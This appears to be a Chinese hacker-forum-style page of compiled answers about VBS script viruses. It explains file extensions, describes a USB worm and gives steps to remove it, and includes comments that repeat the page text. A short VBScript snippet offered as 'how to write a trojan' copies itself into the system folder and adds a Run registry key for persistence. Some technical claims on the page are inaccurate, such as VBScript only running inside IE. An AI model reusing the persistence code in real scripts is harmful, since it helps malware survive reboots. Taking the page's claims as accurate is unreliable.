黑客技术群

黑客入侵,黑客基地,黑客组织,网站黑客,黑客平台

破坏性木马病毒代码vbs格式(木马病毒的格式)

本文导读目录:

.vbs是什么文件。它的名字是一串数字,扩展名是.vbs,是木马还是病毒?

VBS脚本病毒是使用VBScript编写。以宏病毒和新欢乐时光光病毒为典型代表的VBS脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。使用VBScript编写。以宏病毒和新欢乐时光病毒为典型代表的VBS脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。

下面是百度百科的链拉,里面有详细的介绍,希望对您有帮助

pif、vbe、vbs的文件后缀都代表什么意思?木马文件一般以什么后缀?

Pif的中文名称叫:程序信息文件大概是“program information file”的缩写。指向DOS程序的快捷方式就是PIF文件,自从windows3.1就有了,内中包含执行DOS程序的一些设置,比如路径、窗口和字体。

VBE跟VBS差不多,都是VB脚本代码文件,但他们也有不同:VBS是明文代码,就是说可以直接使用记事本编辑;VBE则是编译后(加密)的VBS代码,使用记事本打开不能直接看到源代码。(有些例外)加密工具有很多,其中常用的是 Microsoft Script Encoder(screnc.exe),此外还有许多。VBE格式在QQ传文件中往往不会被拦截,而VBS格式却会被拦截,这应该是程序设计者的一个失误。因此,所以很多人没有进行加密而直接改扩展名为“VBE”,依然能够运行,只是为了方便一下。

木马文件的后缀名很多,很难根据后缀名来判断是否是木马,只能根据特征码来判定,一些木马可以通过捆绑GIF,JPG图片来启动,有的则进驻DLL中,很难防范,最好的也是最普遍的方式就是装杀毒软件了

U盘中病毒,病毒后缀是vbs,如何清除病毒?

VBS病毒编写简单,但通过U盘传播是很有效的,很多人遇到的vbs病毒一般是movemenoreg.vbs,installer.vbs,helper.vbs这种病毒,而且需要打开隐藏系统文件设置才能在U盘里看到,隐藏的时候是不知道已经感染病毒了,这种病毒一般感染电脑后会把你的电脑当做肉鸡挖矿使用,所以很多人都根本不能发现,所以我们需要定时用专用的工具来对U盘进行杀毒,从而判断电脑有没有感染一些恶意木马。

感染后的U盘表现:

该病毒会在感染的U盘的根目录下建立两个隐藏目录和一个快捷方式文件,其中两个隐藏目录的名称分别为“-”和“WindowsServices”。在名为“-”的目录下存放着用户原来U盘里面的所有文件,在名为“WindowsServices”的目录下存放着三个病毒文件,文件名为:movemenoreg.vbs,installer.vbs,helper.vbs。

感染路径:

U盘被感染后,插入新的电脑上,只要点击了U盘里的模仿你正常文件的快捷方式就触发感染到新电脑上,一般复制病毒到电脑%AppData%\WindowsServices目录下,然后添加开机启动,如果有新U盘插上就麻烦感染新的U盘。

一、手动清除方法:

1、先显示隐藏系统文件,打开任意一个文件夹,点击工具-文件夹选项-然后选择查看,取消勾选

隐藏受保护的操作系统文件,隐藏文件和文件夹选择显示隐藏的文件。

2、找到三个文件所在的位置,U盘里的打开就能看到,直接删除,电脑系统里的在C:\Users\Administrator\AppData\Roaming\WindowsServices文件夹里,但不是每个电脑都是这个文件夹。【C:\Users\****(这里就用你们自己名称)****\AppData\Roaming\WindowsServices\】文件夹是用中文显示的,所以找不到的小伙伴,就直接复制路径,改成你们的用户名就行了。3、注意U盘要先拔出电脑,然后再删电脑里的这些病毒文件,WindowsServices里有三个文件movemenoreg.vbs,installer.vbs,helper.vbs,删掉。

二、软件清除

U盘杀毒软件里清除vbs病毒的usbkiller工具,直接扫描电脑和U盘里所有的vbs病毒,清除所有VBS病毒,比手动操作方便,手动适合无网络的时候使用。

可以看到扫描对方选择,内存,本地硬盘和移动存储就是U盘后,点击开始扫描等待扫描完成就发现vbs病毒全部列出且已经清除病毒的结果。

如何使用VBS撰写一个木马

这个嘛,前面二个比较简单

set fso=createobject(scripting.filesystemobject)

set dir=fso.getspecialfolder(1)‘获得Windows\system32系统文件夹

fso.getfile(wscript.scriptfullname).copy(dir"\vbs.vbs")‘将自己复制到系统文件夹,并命名为vbs

set wshshell=createobject(wscript.shell)

wshshell.regwrite"HKLM\software\microsoft\windows\currentversion\run\vbs",dir"\vbs.vbs","vbs.vbs"'加入启动项

电脑中了vbs病毒怎么解决

VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:

编写简单、破坏力大、感染力强、传播范围广、变种多、欺骗性强;可以通过通过Email附件传播;通过局域网共享传播;通过感染htm、asp、jsp、php等网页文件传播;通过IRC聊天通道传播;

VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,中毒后的电脑会在各个盘符下面生成.vbs、autorun.exe等文件。下面笔者将一次手动成功清除VBS病毒的过程说一下,权当交流!

通过系统的资源管理器,可以看到一直有一个wscript.exe的进程存在,还有就是会感觉到机子很卡……

第一步:限制wscript.exe进程的运行。“开始——运行”,输入gpedit.msc,然后依次打开“计算机配置——Windows设置——安全设置——软件限制策略”,右键,选择“创建新策略”,选择“其他规则”,在右侧窗格空白处右击,在菜单中选择“新建路径规则”项,浏览选择C:\Windows\System32文件夹下的wscript.exe,将其安全级别设为“不允许”。这样我们就成功的限制了wscript.exe的运行。

第二步:通过任务管理器或者其他的工具,结束进程wscript.exe。

第三步:借助工具冰刃,删除各个盘符下面的.VBS、.vbe、js、autorun等文件。

第四步:搜索一下,在系统目录中是否还有.VBS、.vbe、js等文件存在,如果有,删除掉。在看看系统的启动项中有没有不明的启动项,如果有,也要删除掉!

第五步:重新启动电脑,看到各个盘符下面就没有.VBS等类型的文件了,系统也恢复到正常。

到这里,就已经成功的清除了VBS病毒!总结一下,重点是要限制VBS病毒的运行,只有先限制了它的运行,我们后面的删除工作才能正常的进.

怎么用VBScript做一个可以破坏系统的病毒?

这个很难,几乎不可能

1、VBScript只能运行在IE浏览器中,即使做成VBS可独立运行的文件,也无法完全脱离IE浏览器;

2、VBScript是脚本程序,除了要受IE浏览器的安全机制约束,还要受其他很多限制,如果电脑系统中存在阶级,那么VBScript就是最底层的贫民,是屌丝中的屌丝;

3、360这类的安全软件对VBScript这类脚本程序一向严查、毫不手软的;

4、即使以上这些都不算事,一个软件要想破坏系统也绝非易事,也不知你说的破坏系统究竟是指破坏硬件系统还是软件系统,前者是不可能的,后者在几乎每台电脑都装了360或电脑管家的今天也几乎是不可能的;

5、即使以上这些都能做到,你还要求简单一些,那就只有上帝知道了,前提是上帝也懂编程。

  • 评论列表:
  •  瑰颈过活
     发布于 2022-06-25 07:55:20  回复该评论
  • 清除了VBS病毒!总结一下,重点是要限制VBS病毒的运行,只有先限制了它的运行,我们后面的删除工作才能正常的进.怎么用VBScript做一个可以破坏系统的病毒?这个很难,几乎不可能1、VBS
  •  冢渊寄认
     发布于 2022-06-25 11:13:26  回复该评论
  • :该病毒会在感染的U盘的根目录下建立两个隐藏目录和一个快捷方式文件,其中两个隐藏目录的名称分别为“-”和“WindowsServices”。在名为“-”的目录下存放着用户原来U盘里
  •  辙弃森槿
     发布于 2022-06-25 07:40:17  回复该评论
  • 管家的今天也几乎是不可能的;5、即使以上这些都能做到,你还要求简单一些,那就只有上帝知道了,前提是上帝也懂编程。
  •  澄萌寄晴
     发布于 2022-06-25 04:51:22  回复该评论
  • 360这类的安全软件对VBScript这类脚本程序一向严查、毫不手软的;4、即使以上这些都不算事,一个软件要想破坏系统也绝非易事,也不知你说的破坏系统究竟是指破坏硬件系统还是软件系统,前者是不可能的,后者在几乎
  •  听弧念稚
     发布于 2022-06-25 06:42:22  回复该评论
  • IE浏览器中,即使做成VBS可独立运行的文件,也无法完全脱离IE浏览器;2、VBScript是脚本程序,除了要受IE浏览器的安全机制约束,还要受其他很多限制,如果电脑系统中存在阶级,那么VBScript就是最底层的贫

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.